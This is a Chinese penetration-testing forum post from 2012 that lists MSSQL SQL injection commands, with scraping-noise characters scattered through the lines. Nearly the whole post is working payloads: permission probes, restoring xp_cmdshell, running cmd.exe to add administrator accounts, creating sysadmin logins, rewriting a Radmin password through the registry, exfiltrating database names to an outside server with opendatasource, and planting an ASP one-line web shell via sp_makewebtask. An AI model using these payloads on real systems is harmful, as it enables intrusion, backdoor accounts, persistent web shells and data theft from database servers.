中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
/ q: f. y* l' Rand 1=(Select IS_MEMBER('db_owner'))
& A* `0 }3 B- gAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
6 Y0 Q% b% j8 H0 l( f& z3 }8 N
  c5 D0 R4 y# R3 R1 V//检测是否有读取某数据库的权限
( v& Z4 e* @+ Nand 1= (Select HAS_DBACCESS('master'))9 J9 r5 l' S; G* |+ V7 L
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --6 @" a' c- N: M& @3 R2 s) B8 x: g
5 F8 m0 P: w) S- d& X5 v. I

2 e( M7 |* o9 L/ I) |数字类型, k2 c* b) G3 ^% G$ Y
and char(124)%2Buser%2Bchar(124)=0! C3 X5 u/ y0 |7 t& @0 |
( N6 C- {: {9 _8 \$ Q
字符类型
! P# A" @  |, Z& {: p0 l% [' E' and char(124)%2Buser%2Bchar(124)=0 and ''='; `' l5 b% Q4 K
# u, k+ |) i( _8 ]/ i
搜索类型+ {' m+ H; f7 g" G* q3 M7 H5 o+ ~: V
' and char(124)%2Buser%2Bchar(124)=0 and '%'=': k& r* ~, v3 o, _$ H
3 g2 q9 Z, i' L' d; O1 f  {
爆用户名0 j- e* a+ |$ K' ]
and user>0" T1 {5 z/ _8 r6 Z' \9 _
' and user>0 and ''='
" f" ~" b! N4 w; O: j
+ |, j" X3 Q/ Q+ t6 D检测是否为SA权限
( u' ]* L: F( ?- nand 1=(select IS_SRVROLEMEMBER('sysadmin'));--/ F7 Q5 d) j2 H; i( S3 p
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --- M* z7 B3 S: y) |4 b1 f
- l' N  `+ s# c! s' M4 g& f9 |
检测是不是MSSQL数据库% Z9 p) K( r  G; ?$ n/ t
and exists (select * from sysobjects);--2 p5 a7 e  S2 B) s
2 b3 a: P1 y& B% A7 C$ g! X( X" x
检测是否支持多行" Q4 U# V2 ?+ s3 L' `0 d
;declare @d int;--( v& u  j( Q, C- d* a' {5 e
- P& {4 x0 \! x) l. B
恢复 xp_cmdshell
( b9 W2 ^. Q7 @9 _5 Z;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--3 o2 G- I. b: N+ h) I4 l
+ ?) M. Z  Y6 A

3 ^4 P& ^' ]5 a" b! wselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
7 b4 f6 b' x& ~( \1 l5 F! }  N8 E. w8 m2 k7 h- A( b3 K0 B+ V( R( @) Y
//-----------------------; k/ @1 K0 p, W" b% d$ Z
//       执行命令
1 n" v9 X  H9 C" j) c; ]& _, H//-----------------------
8 J* C. ~" m7 w+ b& c首先开启沙盘模式:
- A0 y" J: d$ ?2 [; Y* d# Mexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1( v8 K6 d. c9 ^% H
" x- w4 l& h  c9 a$ g6 U) E
然后利用jet.oledb执行系统命令
8 B: x+ t$ V: a1 ?select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')7 u/ [0 s7 |1 H5 g0 {7 i
* e+ T# S2 J8 s2 m
执行命令4 S+ F0 ]  z1 z4 _* ?" n4 z$ N; Y* v2 H
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
& v9 n2 k% |& }) Q( h  E
" Q. g) y, ], p8 D/ ?) MEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
' T% K; O. `3 {5 B" y0 A+ O. D% |: d; u. B/ |
判断xp_cmdshell扩展存储过程是否存在:
# ~6 Q7 u( K. y0 A9 J6 u, Phttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'); `8 h9 m% r& E" a) ?& C6 v- x
- L' M/ a% V% n
写注册表: Q. H5 Y; F; P% i& z* K  F
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1# k0 j) G6 Z/ r) B) v
' h* {& p0 N. l0 j0 U; w! i
REG_SZ3 e7 o' s0 V1 v7 f0 \; ]5 e3 j6 I

( _8 w; V5 Y: n% d读注册表0 V# Q8 w! a# e& \  u
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'9 g0 L$ }# c7 j. l0 h) g1 ~1 B
: n, d1 m3 E) g
读取目录内容
- W7 c* H1 [  ?$ I0 Texec master..xp_dirtree 'c:\winnt\system32\',1,10 A" H% ?2 H6 Y* s9 ?
6 m3 r6 }2 c5 Q! b% g; k3 @

9 ?4 I' K( W: \0 e' V- m7 v+ n, j数据库备份% y  t) K/ G. A" D4 X
backup database pubs to disk = 'c:\123.bak'
* `( D1 v. x8 `5 o% z. E; T6 \, j! p6 X8 C5 o. ^6 W6 y  C, E5 W
//爆出长度8 T# U. r' \  j' x
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--7 i* L( J6 j# q1 e) J( N6 r

% T4 h: s5 c8 o7 N# x. f/ E; |) l, _+ ~! U

7 y5 [! U% j8 }) s7 f更改sa口令方法:用sql综合利用工具连接后,执行命令:' V4 r( [* u+ p9 J7 K( H" R; v
exec sp_password NULL,'新密码','sa'
, m. F( T% c9 S, j6 l/ {% J& y8 d& G. f
5 q" Z+ \& J) ^8 k5 c* x6 e4 \) j% P5 y添加和删除一个SA权限的用户test:
) W6 C- Q- b" B. J( _2 c( P. iexec master.dbo.sp_addlogin test,9530772
" Y% D. s5 @$ {0 Uexec master.dbo.sp_addsrvrolemember test,sysadmin3 f# y: u  J' A% d
- P( _8 S0 Z8 Z' H" }
删除扩展存储过过程xp_cmdshell的语句:% E& o9 I9 d4 z8 O5 m
exec sp_dropextendedproc 'xp_cmdshell'
) [7 d* S  ?* [/ V1 j2 `  ?% K9 j% ]" w' p- q
添加扩展存储过过程. g- y8 Y9 C' a' I# X
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
; b/ C- w3 o  P! bGRANT exec On xp_proxiedadata TO public
: q/ h* k( V1 `$ j0 ]3 Z. o
# V- ]2 `3 e9 @3 X- z
$ C. g* E8 j2 p  G2 O# b* v7 Q停掉或激活某个服务。
% |" {2 o4 _- Q6 }0 N% A, g, x* X, \7 B
exec master..xp_servicecontrol 'stop','schedule'" B* K2 e! i; R; ?/ O
exec master..xp_servicecontrol 'start','schedule'
# e; r3 f0 ^- x- T8 \4 E+ T2 x2 d9 ^+ w4 n; X5 c0 z
dbo.xp_subdirs
9 m8 v7 u; N7 X4 c
0 y# |8 j$ ^9 y4 Q2 o' \只列某个目录下的子目录。; q; C5 n% }; T# \5 k) T4 h
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'5 e+ }- v3 `* T- I
% L3 k1 ]' f: g, p% x* B8 a
dbo.xp_makecab
! E1 G' L0 W5 a8 u
  r( e4 V* m! a7 y1 P+ ?1 C将目标多个档案压缩到某个目标档案之内。
1 t6 m, E2 k/ E( j9 v; b: M所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。; k% Q& ^$ ?& g

% x! r) k. @# C8 I1 L1 rdbo.xp_makecab% M( j) u! A% }3 {6 y1 r* N
'c:\test.cab','mszip',1,$ ?7 _; q& e/ W4 t# Q5 Q* _
'C:\Inetpub\wwwroot\SQLInject\login.asp',+ h1 o7 x3 [8 F. B# K
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
+ Z4 J# @( v3 s
, k3 a6 ]9 Y( v/ y) x2 G+ ~( Ixp_terminate_process
4 }; Y' f& D; H
3 A. U  H' _8 Y停掉某个执行中的程序,但赋予的参数是 Process ID。3 I7 J! M7 J0 V9 j- A8 X
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID  o" R( C2 v- m* k$ o
% ^' }' |/ u! U7 I! D
xp_terminate_process 2484$ j2 \2 h* o! q# D; y' ?$ g" U6 |+ z4 F! N
& Q& `2 c; E: a: ?; k, c, D% w
xp_unpackcab
4 Q; e( g2 v+ p( }: C+ g5 o7 Q/ t/ P+ k) Y( T
解开压缩档。
. h* S/ D) p. n/ Q/ m
5 G( }6 [' q+ }0 [. jxp_unpackcab 'c:\test.cab','c:\temp',1/ O8 C( O, ?. W1 D) n3 L3 g# K

4 o  ^' Q: [" |5 I. y( o
& W0 d. |" \" i' Z: a某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
& R# c: [; i, J$ f% \% j+ r# y, y% O" H
create database lcx;
% r; V" F  Z$ `6 fCreate TABLE ku(name nvarchar(256) null);
$ H0 w6 d1 x, KCreate TABLE biao(id int NULL,name nvarchar(256) null);
" r; i# U6 F6 X
/ |# O6 z9 ]/ I//得到数据库名
0 V; K# W6 ]& b1 ^insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
4 T- s# x& p% i+ V6 ?5 `% P* X2 D! K2 Z9 v- u( [5 A8 N4 j8 @7 E
$ z! }1 {! P# e4 `. w' {
//在Master中创建表,看看权限怎样0 t( V8 x, a8 Z( y. v
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--$ q* s/ b) f. g$ L. V0 [
1 }8 K) p$ G3 k5 ?; }* N
用 sp_makewebtask直接在web目录里写入一句话马:3 u' g: R+ t: p. |
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
5 G% u+ P3 R+ @! Y8 j8 U$ p& F5 ^( o5 v! v4 W, x' X$ v
//更新表内容: r* ?* r; q) L1 W
Update films SET kind = 'Dramatic' Where id = 123, `8 w; P: [4 s5 Q2 X7 A9 y
% X/ C6 H% u6 P+ m
//删除内容
) o+ u2 z2 Q' L, idelete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2